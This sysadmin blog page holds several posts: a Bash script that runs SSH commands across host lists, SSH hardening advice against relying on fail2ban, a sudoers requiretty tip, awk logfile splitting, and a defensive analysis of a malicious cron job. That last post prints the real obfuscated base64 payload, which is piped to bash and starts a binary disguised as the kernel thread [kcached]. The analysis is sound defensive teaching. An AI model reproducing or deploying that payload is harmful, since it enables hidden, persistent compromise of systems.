Feuerfest

Just the private blog of a Linux sysadmin

Little helper scripts - Part 2: automation.sh / automation2.sh

Part 1 of this series is here: Little helper scripts - Part 1: no-screenlock-during-meeting.ps1 or use the following tag-link: https://admin.brennt.net/tag/littlehelperscripts

This script is no rocket science. Nothing spectacular. But the amount of hours it saved me in various projects is astonishing.

The sad reality

There are far too many companies (even IT-focused companies!) out there who have a very low level of automation. Virtual machines are created by hand - not by some script using an API. Configurations are not deployed via of some Configuration Management software like Puppet/OpenVox/Chef/Ansible or a Runbook automation software like Rundeck - no, they are handcrafted. Bespoke. System administration like it's 1753. With all the implications and drawbacks that brings.

Containerisation? Yeah.. Well.. "A few docker containers here and there but nobody in the company really knows how that stuff works so we leave it alone" is a phrase I have heard more than a few times. Either directly, or reported from colleagues working in other companies.

This means that I have to log on to systems manually and execute commands by hand. Something I can do and do regularly in my home lab. But to do it for dozens or even hundreds of systems? Yeah... No. Sorry, I've got better things to do. And as an external consultant, the client always keeps an eye on my performance metrics. After all, they are paying my employer a lot of money for my services. Sitting there all day and getting paid to copy and paste commands? It doesn't look good on my performance reporting spreadsheet and it doesn't meet my personal standards of what a consultant should be able to deliver.

I'm just a guest

What's more, because of my work as a consultant, I'm just an external contractor. I come in for a few months to solve a problem or help with a task, and then I move on to the next project at another company. That means I can't just do everything the way I want. I can't just go and install software on all the systems, even though I've been given root privileges. I can't just implement Ansible. I have to design my solutions so that they survive and continue to work when I'm gone. Sure, I can introduce dozens of new technologies and whole new technology stacks. I'm sure my employer would love to have the follow-on support contracts for those constructs. But going it alone will seriously damage the customer relationship. Especially with the IT people. After all, they'll be the ones stuck with new technology they don't understand and will have to spend time learning and familiarising themselves with. And I have been a sysadmin long enough to know what they will think of me if I start pulling such stunts.

Of course I can suggest changes. I can push for standardisation and automation. But for most customers, that will make no difference. After all, there are reasons why a company has stopped keeping up with technology. And fixing this takes time and usually involves a complete change of the dominating mindset. Something I cannot achieve as a lone consultant.

Scripting to the rescue!

First I went with the cheap & easy solution of for server in hosta hostb hostc; do ssh user@$server "command --some-parameter bla"; done but I grew tired of writing it all completely anew for each task.

Natively systems are often grouped into categories (webservers, etc.) or perform the same tasks (think of clusters). Hence commands must be executed on the same set of hosts again and again. One of my colleagues already compiled lists of hostnames group by tasks, roles and installed software. As some systems had the same software installed but were just configured to do different tasks with that software.

Through these list I got an idea: Why not feed those into a for or do-while loop and be done?

In the end I added some safety & DNS checks and named the script automation.sh. Later I added the capability to log the output on each host and named the script automation2.sh, which can be viewed below.

Yes, it's just a glorified nesting of if-statements but the amount of time this script saved me is insane. And as it utilizes only basic Posix & Bash commands I've yet to find a system were it can't be executed.

As always: Please check my GitHub for the most recent version as I won't update the script shown in this article.

#!/bin/bash
# vim: set tabstop=2 smarttab shiftwidth=2 softtabstop=2 expandtab foldmethod=syntax :
#
# Small script to automate custom shell command execution
# Current version can be found here:
# https://github.com/ChrLau/scripts/blob/master/automation2.sh

# Bash strict mode
#  read: http://redsymbol.net/articles/unofficial-bash-strict-mode/
set -euo pipefail
IFS=$'\n\t'

# Set pipefail variable
# As we use "ssh command | tee" and tee will always succeed our check for non-zero exit-codes doesn't work
#
# The exit status of a pipeline is the exit status of the last command in the pipeline,
#  unless the pipefail option is enabled (see: The Set Builtin).
# If pipefail is enabled, the pipeline's return status is the value of the last (rightmost)
#  command to exit with a non-zero status, or zero if all commands exit successfully.

VERSION="1.6"
SCRIPT="$(basename "$0")"
SSH="$(command -v ssh)"
TEE="$(command -v tee)"
# Colored output
RED="\e[31m"
GREEN="\e[32m"
ENDCOLOR="\e[0m"

# Test if ssh is present and executeable
if [ ! -x "$SSH" ]; then
  echo "${RED}This script requires ssh to connect to the servers. Exiting.${ENDCOLOR}"
  exit 2;
fi

# Test if tee is present and executeable
if [ ! -x "$TEE" ]; then
  echo "${RED}tee not found.${ENDCOLOR} ${GREEN}Script can still be used,${ENDCOLOR} ${RED}but option -w CAN NOT be used.${ENDCOLOR}"
fi

function HELP {
  echo "$SCRIPT $VERSION: Execute custom shell commands on lists of hosts"
  echo "Usage: $SCRIPT -l /path/to/host.list -c \"command\" [-u <user>] [-a <YES|NO>] [-r] [-s \"options\"] [-w \"/path/to/logfile.log\"]"
  echo ""
  echo "Parameters:"
  echo " -l   Path to the hostlist file, 1 host per line"
  echo " -c   The command to execute. Needs to be in double-quotes. Else getops interprets it as separate arguments"
  echo " -u   (Optional) The user used during SSH-Connection. (Default: \$USER)"
  echo " -a   (Optional) Abort when the ssh-command fails? Use YES or NO (Default: YES)"
  echo " -r   (Optional) When given command will be executed via 'sudo su -c'"
  echo " -s   (Optional) Any SSH parameters you want to specify Needs to be in double-quotes. (Default: empty)"
  echo "                 Example: -s \"-i /home/user/.ssh/id_user\""
  echo " -w   (Optional) Write STDERR and STDOUT to logfile (on the machine where $SCRIPT is executed)"
  echo ""
  echo "No arguments or -h will print this help."
  exit 0;
}

# Print help if no arguments are given
if [ "$#" -eq 0 ]; then
  HELP
fi

# Parse arguments
while getopts ":l:c:u:a:hrs:w:" OPTION; do
  case "$OPTION" in
    l)
      HOSTLIST="${OPTARG}"
      ;;
    c)
      COMMAND="${OPTARG}"
      ;;
    u)
      SSH_USER="${OPTARG}"
      ;;
    a)
      ABORT="${OPTARG}"
      ;;
    r)
      SUDO="YES"
      ;;
    s)
      SSH_PARAMS="${OPTARG}"
      ;;
    w)
      LOGFILE="${OPTARG}"
      ;;
    h)
      HELP
      ;;
    *)
      HELP
      ;;
# Not needed as we use : as starting char in getopts string
#    :)
#      echo "Missing argument"
#      ;;
#    \?)
#      echo "Invalid option"
#      exit 1
#      ;;
  esac
done

# Give usage message and print help if both arguments are empty
if [ -z "$HOSTLIST" ] || [ -z "$COMMAND" ]; then
  echo "You need to specify -l and -c. Exiting."
  exit 1;
fi

# Check if username was provided, if not use $USER environment variable
if [ -z "$SSH_USER" ]; then
  SSH_USER="$USER"
fi

# Check for YES or NO
if [ -z "$ABORT" ]; then
  # If empty, set to YES (default)
  ABORT="YES"
# Check if it's not NO or YES - we want to ensure a definite decision here
elif [ "$ABORT" != "NO" ] && [ "$ABORT" != "YES" ]; then
  echo  "-a accepts either YES or NO (case-sensitive)"
  exit 1
fi

# If variable logfile is not empty
if [ -n "$LOGFILE" ]; then

  # Check if logfile is not present
  if [ ! -e "$LOGFILE" ]; then
    # Check if creating it was unsuccessful
    if ! touch "$LOGFILE"; then
      echo "${RED}Could not create logfile at $LOGFILE. Aborting. Please check permissions.${ENDCOLOR}"
      exit 1
    fi
  # When logfile is present..
  else
    # Check if it's writeable and abort when not
    if [ ! -w "$LOGFILE" ]; then
      echo "${RED}$LOGFILE is NOT writeable. Aborting. Please check permissions.${ENDCOLOR}"
      exit 1
    fi
  fi
fi

# Execute command via sudo or not?
if [ "$SUDO" = "YES" ]; then
  COMMANDPART="sudo su -c '${COMMAND}'"
else
  COMMANDPART="${COMMAND}"
fi

# Check if hostlist is readable
if [ -r "$HOSTLIST" ]; then
  # Check that hostlist is not 0 bytes
  if [ -s "$HOSTLIST" ]; then
  
    while IFS= read -r HOST
    do

      getent hosts "$HOST" &> /dev/null
      
      # getent returns exit code of 2 if a hostname isn't resolving
      # shellcheck disable=SC2181
      if [ "$?" -ne 0 ]; then
        echo -e "${RED}Host: $HOST is not resolving. Typo? Aborting.${ENDCOLOR}"
        exit 2
      fi

      # Log STDERR and STDOUT to $LOGFILE if specified
      if [ -n "$LOGFILE" ]; then
        echo -e "${GREEN}Connecting to $HOST ...${ENDCOLOR}" 2>&1 | tee -a "$LOGFILE"
        ssh -n -o ConnectTimeout=10 "${SSH_PARAMS}" "$SSH_USER"@"$HOST" "${COMMANDPART}" 2>&1 | tee -a "$LOGFILE"

        # Test if ssh-command was successful
        # shellcheck disable=SC2181
        if [ "$?" -ne 0 ]; then
          echo -n -e "${RED}Command was NOT successful on $HOST ... ${ENDCOLOR}" 2>&1 | tee -a "$LOGFILE"

          # Shall we proceed or not?
          if [ "$ABORT" = "YES" ]; then
            echo -n -e "${RED}Aborting.${ENDCOLOR}\n" 2>&1 | tee -a "$LOGFILE"
            exit 1
          else
            echo -n -e "${GREEN}Proceeding, as configured.${ENDCOLOR}\n" 2>&1 | tee -a "$LOGFILE"
          fi
        fi

      else

        echo -e "${GREEN}Connecting to $HOST ...${ENDCOLOR}"
        ssh -n -o ConnectTimeout=10 "${SSH_PARAMS}" "$SSH_USER"@"$HOST" "${COMMANDPART}"

        # Test if ssh-command was successful
        # shellcheck disable=SC2181
        if [ "$?" -ne 0 ]; then
          echo -n -e "${RED}Command was NOT successful on $HOST ... ${ENDCOLOR}"

          # Shall we proceed or not?
          if [ "$ABORT" = "YES" ]; then
            echo -n -e "${RED}Aborting.${ENDCOLOR}\n"
            exit 1
          else
            echo -n -e "${GREEN}Proceeding, as configured.${ENDCOLOR}\n"
          fi
        fi

      fi

    done < "$HOSTLIST"

  else
    echo -e "${RED}Hostlist \"$HOSTLIST\" is empty. Exiting.${ENDCOLOR}"
    exit 1
  fi

else
  echo -e "${RED}Hostlist \"$HOSTLIST\" is not readable. Exiting.${ENDCOLOR}"
  exit 1
fi
Comments

Opinion: fail2ban doesn't increase system security, it's just a mere logfile cleanup tool

Like many IT people, I pay to have my own server for personal projects and self-hosting. As such, I am responsible for securing these systems as they are, of course, connected to the internet and provide services to everyone. Like this blog for example. So I often read about people installing Fail2Ban to "increase the security of their systems".

And every time I read this, I am like this popular meme from the TV series Firefly:

As I don't share this view of Fail2Ban - in fact, I'm against the view that it improves security - but I'll keep quiet, knowing that starting this discussion is simply not helpful. Nor that it is wanted.

For me, Fail2Ban is just a log cleanup tool. Its only benefit is that it will catch repeated login attempts and deny them by adding firewall rules to iptables/nftables to block traffic from the offending IPs. This prevents hundreds or thousands of extra logfile lines about unsuccessful login attempts. So it doesn't improve the security of a system, as it doesn't prevent unauthorised access or strengthen authorisation or authentication methods. No, Fail2Ban - by design - can only act when an IP has been seen enough times to trigger an action from Fail2Ban.

With enough luck on the part of the attacker - or negligence on the part of the operator - a login will still succeed. Fail2Ban won't save you if you allow root to login via SSH with the password "root" or "admin" or "toor".

Granted, even Fail2Ban knows this and they write this prominently on their project's GitHub page:

Though Fail2Ban is able to reduce the rate of incorrect authentication attempts, it cannot eliminate the risk presented by weak authentication. Set up services to use only two factor, or public/private authentication mechanisms if you really want to protect services.

Source: https://github.com/fail2ban/fail2ban

Yet, the number of people I see installing Fail2Ban to "improve SSH security" but refusing to use public/private key authentication is staggering.

I only allow public/private key login for select non-root users specified via AllowUsers. Absolutely no password logins allowed. I've changed the SSH port away from port 22/tcp and I don't run Fail2Ban. As with this setup, there are not that many login attempts anyway. And those that do tend to abort pretty early on when they realise that password authentication is disabled.

Although in all honesty: Thanks to services like https://www.shodan.io/ and others finding out the changed SSH port is not a problem. There are dozens of tools that can detect what is running behind a port and act accordingly. Therefore I do see my fair share of SSH bruteforce attempts. Denying password authentication is the real game changer.

So do yourself a favour: Don't rely on Fail2Ban for SSH security. Rely on the following points instead:

  • Keep your system up to date! As this will also remove outdated/broken ciphers and add support for new, more secure ones. All the added & improved SSH security gives you nothing if an attacker can gain root privileges via another vulnerability.
  • AllowUsers or AllowGroups: To only specified users to login in via SSH. This is generally preferred over using DenyUsers or DenyGroups as it's generally wiser to specify "what is allowed" as to specify "what is forbidden". As the bad guys are pretty damn good in finding the flaws and holes in the later one.
  • DenyUsers or DenyGroups: Based on your groups this may be useful too but I try to avoid using this.
  • AuthorizedKeysFile /etc/ssh/authorized_keys/%u: This will place the authorized_keys file for each user in the /etc/ssh/authorized_keys/ directory. This ensures users can't add public keys by themselves. Only root can.
  • PermitEmptyPasswords no: Should be self-explaining. Is already a default.
  • PasswordAuthentication no and PubkeyAuthentication yes: Disables authentication via password. Enabled authentication via public/private keys.
  • AuthenticationMethods publickey: To only offer publickey authentication. Normally there is publickey,password or the like.
  • PermitRootLogin no: Create a non-root account and use su. Or install sudo and use that if needed. See also AllowUsers.
Comments

Why I prefer !requiretty over "ssh -t"

Dall-E https://admin.brennt.net/bl-content/uploads/pages/dad5b98ab9f04a2cdca5de3afe2f6b0e/dall-e_sudo.jpg

Claudio Künzler, whom I know briefly from working with him on enhancing is check_equallogic back in 2010, wrote an article over at Geeker's Digest on How to use sudo inside SSH command. Of course he mentions the ssh -t parameter, as without it, we would get the following error message when calling sudo: (Example shamelessly stolen from his article. 😇)

ck@linux:~$ ssh targetserver "sudo whoami"
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required

And ssh -t is the right call here. Well, to be fair: It's not the only solution and in my eyes even not the best solution.

No, I am not talking about piping the password into the command prompt which is so often recommend as a solution (it's not!) that it makes me sad.

I am talking about the usage of negating requiretty in the /etc/sudoers file or a file under /etc/sudoers.d/ respectively.

Lets take the /etc/sudoers.d/icinga2 file I use in my article How to monitor your APT-repositories with Icinga:

Here I must use NOPASSWD for all executed commands and monitoring plugins as well as the line Defaults:icinga2 !requiretty. This negates the need for a tty for the icinga2 user completely. Omitting either the NOPASSWD or the !requiretty will give us the error message we see above.

root@admin:~ # cat /etc/sudoers.d/icinga2
# This line disables the need for a tty for sudo
#  else we will get all kind of "sudo: a password is required" errors
Defaults:icinga2 !requiretty

# sudo rights for Icinga2
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/unattended-upgrades
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/unattended-upgrade
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/apt-get
icinga2  ALL=(ALL) NOPASSWD: /usr/lib/nagios/plugins/check_apt

It's also possible to just negate requiretty based on the path to the binary. As mentioned in this StackExchange question: How to disable requiretty for a single command in sudoers?

However keep in mind that the ordering of lines in a sudoers file is important! Quoting man sudoers from the SUDOERS FILE FORMAT section:

When multiple entries match for a user, they are applied in order. Where there are multiple matches, the last match is used (which is not necessarily the most specific match).

Why not just use ssh -t?

Personally I prefer the configuration/setting of sudo-related parameters in an /etc/sudoers.d/ file. My reasons are:

When properly configured via a sudoers file it doesn't matter if a command is called via ssh, ssh -t or any other way. Hence enhancing operational stability and making it easier for users as they don't have to remember adding the -t parameter.

And it, at least, servers as some form of documentation that this user/binary is called from another script/host/etc. giving you a clue that these sudo rights are needed/used for.

Comments

Howto properly split all logfile content based on timestamps - and realizing my own fallacy

Photo by Mikhail Nilov: https://www.pexels.com/photo/person-in-black-hoodie-using-a-computer-6963061/

I use a Pi-hole for DNS based AdBlocking in my home network. Additionally I installed Unbound as recursive DNS resolver on it. Meaning: I can use the RaspberryPi in my network at home as the DNS server for all my devices. This way I don't have to use the DNS-Servers of my ISP granting me some additionally privacy. Additionally I can see which DNS queries are sent by each device. Leading to surprising revelations.

However recently my internet connection was interrupted and afterwards I noticed that I couldn't access any site or services where I used a domain or hostname to connect to. And while the problem itself (dnsmasq: Maximum number of concurrent DNS queries reached (max: 150)) was fixed easily with a simple restart of the unbound service, I noticed that the /var/log/unbound/unbound.log logfile was uncompressed, unrotated and 3.3 gigabyte in size. Whoops. That happens when no logrotate job is present.

Side gig: A logrotate config for Unbound

Fixing this issue was rather easy. A short search additionally revealed that unbound-control has a log_reopen option which is a good idea to trigger after the logrotate. This way Unbound properly closes old filehandles and uses the new logfile.

root@pihole:~# cat /etc/logrotate.d/unbound
/var/log/unbound/unbound.log {
        monthly
        missingok
        rotate 12
        compress
        delaycompress
        notifempty
        sharedscripts
        create 644
        postrotate
                /usr/sbin/unbound-control log_reopen
        endscript
}

But wait, there is more

However I had it on my list to dig deeper into the dnsmasq: Maximum number of concurrent DNS queries reached (max: 150) error in order to better understand the whole construct of Pi-hole, dnsmasq and Unbound.

However, the logfile was way too big to work conveniently with it. 49.184.687 lines are just too much. Especially on a RaspberryPi with the, in comparison, limited CPU power. Now I could have just split it up after n lines using split -l number-of-lines but that is:

  • Too easy and
  • Did I encounter the need for a script which splits logfile lines based on a range of timestamps more often in the recent time

How to properly split a logfile - and overcomplicating stuff

Most of the unbound logfile lines will have the Unix timestamp in brackets, followed by the process name, the log level the message belongs too and the actual message.

root@pihole:~# head -n 1 /var/log/unbound/unbound.log
[1700653509] unbound[499:0] debug: module config: "subnetcache validator iterator"

However some multi-line message wont follow this format:

[1700798246] unbound[1506:0] info: incoming scrubbed packet: ;; ->>HEADER<<- opcode: QUERY, rcode: NOERROR, id: 0
;; flags: qr aa ; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
chat.cdn.whatsapp.net.  IN      A

;; ANSWER SECTION:
chat.cdn.whatsapp.net.  60      IN      A       157.240.252.61

;; AUTHORITY SECTION:

;; ADDITIONAL SECTION:
;; MSG SIZE  rcvd: 55

[1700798246] unbound[1506:0] debug: iter_handle processing q with state QUERY RESPONSE STATE

This means we need the following technical approach:

  1. Generate the Unix-timestamp for the first day in a month at 00:00:00 o'clock
    • Alternatively formulated: The Unix-timestamp for the first second of a month
  2. Generate the Unix-timestamp for the last day of the month at 23:59:59 o'clock
    • The last second of a month
  3. Find the first occurrence of the timestamp from point 1
  4. Find the last occurrence of the timestamp from point 2
  5. Use sed to move the lines for each month into a separate logfile

I will however also show an awk command on how to filter based on the timestamps, useful for logfiles where every line is prefix with a timestamp.

Calculating with date

Luckily date is powerful and easy to use for date calculations. %s gives us the Unix timestamp. We do not need to specify hours:minutes:seconds as date automatically takes 00:00:00 for these values. Automatically giving us the first second of a day. And date also takes care of leap years and possible a lot of other nuisances when it comes to time and date calculations.

To get the last second of a month we simply take the first day of the month, add a month and subtract one second. It can't be easier.

# Unix timestamp for the first second in a month
user@host:~$ date -d "$(date +%Y/%m/01)" "+%Y/%m/%d %X - %s"
2024/11/01 00:00:00 - 1730415600

# Unix timestamp for the last second in a month
user@host:~$ date -d "$(date +%Y/%m/01) + 1 month - 1 second" "+%Y/%m/%d %X - %s"
2024/11/30 23:59:59 - 1733007599

To verify the value we can use this for-loop. It will give us all the date and timestamps we need to confirm that our commands are correct.

user@host:~$ for YEAR in {2023..2024}; do for MONTH in {1..12}; do echo -n "$(date -d "$(date +$YEAR/$MONTH/01)" "+%Y/%m/%d %X - %s")  "; date -d "$(date +$YEAR/$MONTH/01) + 1 month - 1 second" "+%Y/%m/%d %X - %s"; done; done
2023/01/01 00:00:00 - 1672527600  2023/01/31 23:59:59 - 1675205999
2023/02/01 00:00:00 - 1675206000  2023/02/28 23:59:59 - 1677625199
2023/03/01 00:00:00 - 1677625200  2023/03/31 23:59:59 - 1680299999
2023/04/01 00:00:00 - 1680300000  2023/04/30 23:59:59 - 1682891999
2023/05/01 00:00:00 - 1682892000  2023/05/31 23:59:59 - 1685570399
2023/06/01 00:00:00 - 1685570400  2023/06/30 23:59:59 - 1688162399
2023/07/01 00:00:00 - 1688162400  2023/07/31 23:59:59 - 1690840799
2023/08/01 00:00:00 - 1690840800  2023/08/31 23:59:59 - 1693519199
2023/09/01 00:00:00 - 1693519200  2023/09/30 23:59:59 - 1696111199
2023/10/01 00:00:00 - 1696111200  2023/10/31 23:59:59 - 1698793199
2023/11/01 00:00:00 - 1698793200  2023/11/30 23:59:59 - 1701385199
2023/12/01 00:00:00 - 1701385200  2023/12/31 23:59:59 - 1704063599
2024/01/01 00:00:00 - 1704063600  2024/01/31 23:59:59 - 1706741999
2024/02/01 00:00:00 - 1706742000  2024/02/29 23:59:59 - 1709247599
2024/03/01 00:00:00 - 1709247600  2024/03/31 23:59:59 - 1711922399
2024/04/01 00:00:00 - 1711922400  2024/04/30 23:59:59 - 1714514399
2024/05/01 00:00:00 - 1714514400  2024/05/31 23:59:59 - 1717192799
2024/06/01 00:00:00 - 1717192800  2024/06/30 23:59:59 - 1719784799
2024/07/01 00:00:00 - 1719784800  2024/07/31 23:59:59 - 1722463199
2024/08/01 00:00:00 - 1722463200  2024/08/31 23:59:59 - 1725141599
2024/09/01 00:00:00 - 1725141600  2024/09/30 23:59:59 - 1727733599
2024/10/01 00:00:00 - 1727733600  2024/10/31 23:59:59 - 1730415599
2024/11/01 00:00:00 - 1730415600  2024/11/30 23:59:59 - 1733007599
2024/12/01 00:00:00 - 1733007600  2024/12/31 23:59:59 - 1735685999

To verify we can do the reverse (Unix timestamp to date) with the following command:

user@host:~$ date -d @1698793200
Wed  1 Nov 00:00:00 CET 2023

Solution solely working on timestamps

As the logfile timestamp is enclosed in brackets we need to tell awk to treat either [ or ] as a field separator. Then we can use awk to check if the second field is in a given time frame. For the first test run we define the variables manually in our shell and adjust the date commands to only output the Unix timestamp.

And as the logfile starts in November 2023 I set the values accordingly. awk then conveniently puts all lines whose timestamp is between these to values into a separate logfile.

user@host:~$ YEAR=2023
user@host:~$ MONTH=11
user@host:~$ FIRST_SECOND=$(date -d "$(date +$YEAR/$MONTH/01)" "+%s")
user@host:~$ LAST_SECOND=$(date -d "$(date +$YEAR/$MONTH/01) + 1 month - 1 second" "+%s")
user@host:~$ awk -F'[\\[\\]]' -v MIN=${FIRST_SECOND} -v MAX=${LAST_SECOND} '{if($2 >= MIN && $2 =< MAX) print}' /var/log/unbound/unbound.log >> /var/log/unbound/unbound-$YEAR-$MONTH.log

And this would already work fine, if every line would start with the timestamp. As this is not the case we need to add a bit more logic.

So the resulting script would look like this:

user@host:~$ cat date-split.sh
#!/bin/bash
# vim: set tabstop=2 smarttab shiftwidth=2 softtabstop=2 expandtab foldmethod=syntax :

# Split a logfile based on timestamps

LOGFILE="/var/log/unbound/unbound.log"
AWK="$(command -v awk)"
GZIP="$(command -v gzip)"

for YEAR in {2023..2024}; do
  for MONTH in {1..12}; do

    # Logfile starts November 2023 and ends November 2024 - don't grep for values before/after that time window
    if  [[ "$YEAR" -eq 2023 && "$MONTH" -gt 10 ]] ||  [[ "$YEAR" -eq 2024 && "$MONTH" -lt 12 ]]; then

      # Debug
      echo "$YEAR/$MONTH"

      # Calculate first and last second of each month
      FIRST_SECOND="$(date -d "$(date +"$YEAR"/"$MONTH"/01)" "+%s")"
      LAST_SECOND="$(date -d "$(date +"$YEAR"/"$MONTH"/01) + 1 month - 1 second" "+%s")"

      # Export variables so the grep in the sub-shells have this value
      export FIRST_SECOND
      export LAST_SECOND

      # Split logfiles solely based on timestamps
      awk -F'[\\[\\]]' -v MIN=${FIRST_SECOND} -v MAX=${LAST_SECOND} '{if($2 >= MIN && $2 <= MAX) print}' unbound.log >> "unbound-$YEAR-$MONTH.log"

      # Creating all those separate logfiles will probably fill up our diskspace
      #  therefore we gzip them immediately afterwards
      "$GZIP" "/var/log/unbound/unbound-$YEAR-$MONTH.log"

    fi

  done;
done

However, this script is vastly over-engineered. Why? Read on.

StackOverflow to the rescue

I still had the problem with the multi-line log messages. At first I wanted to use grep to get the matching first and last line numbers with head and tail. But uh.. Yeah, I had a fallacy here. As still wouldn't have worked with multi-line logmessages without a timestamp. Also using grep like this is highly inefficient. While it would be fine for a one-time usage script I still hit a road block.

I just wasn't able to get awk to do what I wanted and I resorted to asking my question on StackOverflow. Better to get the input from others then wasting a lot of time.

awk to the rescue

It was only through the answer that I realized that my solution was a bit over-engineered. Why use date if you can use strftime to calculate the year and month from the timestamp directly? The initial answer was:

awk '
$1 ~ /^\[[0-9]+]$/ {
  f = "unbound-" strftime("%m-%Y", substr($1, 2, length($1)-2)) ".log"
  if (f != prev) close(f); prev = f
}
{
  print > f
}' unbound.log

How this works has been explained in detail on StackOverflow, so I just copy & paste it here.

For each line which first field is a [timestamp] (that is, matches regexp ^\[[0-9]+]$), we use substr and length to extract timestamp, strftime to convert it to a mm-YYYY string and assign "unbound-mm-YYYY.log" to variable f. In the second block, that applies to all lines, we print the current line in file f. Note: contrary to shell redirections, in awk, print > FILE appends to FILE.

Edit: as suggested by Ed Morton closing each file when we are done with it should significantly improve the performance if the total number of files is large. if (f != prev) close(f); prev = f added. Ed also noted that escaping the final ] in the regex is useless (and undefined behavior per POSIX). Backslash removed.

And this worked flawlessly. The generated monthly logfiles from my testfile matched exactly the line-numbers per month. Even multi-line log messages and empty lines were included.

All I then did was adding gzip to compress the files directly before the next file is created. Just to prevent filling up the disk completely. Additionally I change the filename from unbound-MM-YYYY.log to unbound-YYYY-MM.log. Yes, the logfile name won't work with logrotate. But I just need it to properly dig through the files and the Year-Month naming will be of great help here. Afterwards I don't need them anymore and will delete them. So this was none of my concern.

This was my new working solution:

awk '$1 ~ /^\[[0-9]+]$/ {
  f = "unbound-" strftime("%Y-%m", substr($1, 2, length($1)-2)) ".log"
  if (f != prev) {
    if (prev) system("gzip " prev)
    close(prev)
    prev = f
  }
}
{
  print > f
}
END {
  if (prev) system("gzip " prev)
}' unbound.log

No bash script with convoluted logic needed. And easily useable for other logfiles too. Just adopt the starting regular expression to match the one the logfile uses and adopt the logic for strftime so the proper timestamp can be created.

Sometimes it's better to ask other people. 😄

Comments

Why basics matter

Photo by George Becker: https://www.pexels.com/photo/1-1-3-text-on-black-chalkboard-374918/

Someone on the Internet asked on Reddit what this CronJob does, as it looked strange.

{ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvYWRtaW4vd3d3L2dzLWRidXMuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdba2NhY2hlZF0nICcvaG9tZS9hZG1pbi93d3cvZ3MtZGJ1cyciIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random

And for most people in that subreddit several things were immediately obvious:

  1. The commands are obfuscated by encoding them in base64. Are very common method to - sort of - hide malicious contents
  2. As such this is, most likely, a harmful, malicious CronJob not created by a legitimate user of that system
  3. The person asking lacks basic Linux knowledge as the |base64 -d|bash; part clearly states that the base64-string is decoded and piped into a bash process to be executed
    • Anyone with basic knowledge would simply have taken the string and piped it into base64 -d retrieving the decoded string for further analysis without executing it.

And if we do exactly that, we get the following decoded string:

user@host:~ $ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvYWRtaW4vd3d3L2dzLWRidXMuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdba2NhY2hlZF0nICcvaG9tZS9hZG1pbi93d3cvZ3MtZGJ1cyciIDI+L2Rldi9udWxsCg==|base64 -d
/usr/bin/pkill -0 -U1004 gs-dbus 2>/dev/null || SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /home/admin/www/gs-dbusdata -liqD" /usr/bin/bash -c "exec -a '[kcached]' '/home/admin/www/gs-dbus'" 2>/dev/null

With these commands do is explained fairly simple. pkill checks (the -0 parameter) if a process named gs-dbus is already running under the user ID 1004. If a process is found pkill exits with 0 and everything after the || (logical OR) is not executed.

The right part of the OR is only executed when pkill exits with a 1 as no process named gs-dbus is found. On the right part there are a few environment variables and parameters being set and the process is started via the /home/admin/www/gs-dbus binary and then renamed into [kcached].

And while this explains what is logically happening. It still doesn't explain what this CronJob actually does.

Now another person explained that it is the gs-dbus service from Gnome being started, if it isn't already running and claimed it being probably safe. Why this person came to this conclusion is beyond me. Probably because https://gitlab.gnome.org/GNOME/gnome-software/-/blob/main/src/gs-dbus-helper.c shows up as a result if you just search for gs-dbus. But again this person oversaw a some critical pieces of information.

And this made me taking my time to write this little blogpost about how to approach such situations.

As there are some crucial pieces of evidence which immediately tell me that this is not a legitimate piece of software.

  1. Base64 encoded hashes which get executed via bash are almost never doing anything good
  2. If that software really belongs to Gnome you have Systemd unit-Files or Timers. Or if that is a system without Systemd: You got good old init. But then again there would, most likely, be some kind of Gnome sub-process started by Gnome itself and not some obfuscated CronJob
  3. Renaming the processname to [kcached] makes it look like a kernel level thread. If there is an equivalent to "World biggest warning sign" this is it.
  4. The binary being started is /home/admin/www/gs-dbus. You notice www as being the folder where the binary is stored? Yeah, this is always an indicator that files in that folder are reachable via a Webserver. Hence I assume that /home/admin/www/ hosts some vulnerable web application and this was the entry point for the malicious software & CronJob.

As what the person missed is: Processes in square brackets are always kernel level threads, running as root and have a Parent Process ID (PPID) of 2. This means someone is renaming a process started by a non-root user to look like a kernel level thread. Obviously to feint the users and security mechanisms of that system. There is no legitimate reason to do so.

Would you investigate further or even kill that process when some scanning software reports a kernel level thread? Well, the obvious answer is: Of course, YES! But far too many inexperienced users won't.

All processes with [] around them are started by kthreadd - the Kernel Thread Daemon. kthreadd itself is started by the kernel during boot.

Therefore we have 3 truths about kernel level threads:

  1. They will always have the process ID 2 as their parent process ID (PPID)
  2. They will always run as root, never as a user
  3. They will always be started by [kthreadd] itself

Lets take a look at the following ps output from one of my Debian systems. I make it quick & dirty and simply grep for all processes with a [ in it.

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
      2       0 root     kthreadd        [kthreadd]
      3       2 root     rcu_gp          [rcu_gp]
      4       2 root     rcu_par_gp      [rcu_par_gp]
      5       2 root     slub_flushwq    [slub_flushwq]
      6       2 root     netns           [netns]
      8       2 root     kworker/0:0H-ev [kworker/0:0H-events_highpri]
     10       2 root     mm_percpu_wq    [mm_percpu_wq]
     11       2 root     rcu_tasks_kthre [rcu_tasks_kthread]
     12       2 root     rcu_tasks_rude_ [rcu_tasks_rude_kthread]
     13       2 root     rcu_tasks_trace [rcu_tasks_trace_kthread]
     14       2 root     ksoftirqd/0     [ksoftirqd/0]
     15       2 root     rcu_preempt     [rcu_preempt]
     16       2 root     migration/0     [migration/0]
     18       2 root     cpuhp/0         [cpuhp/0]
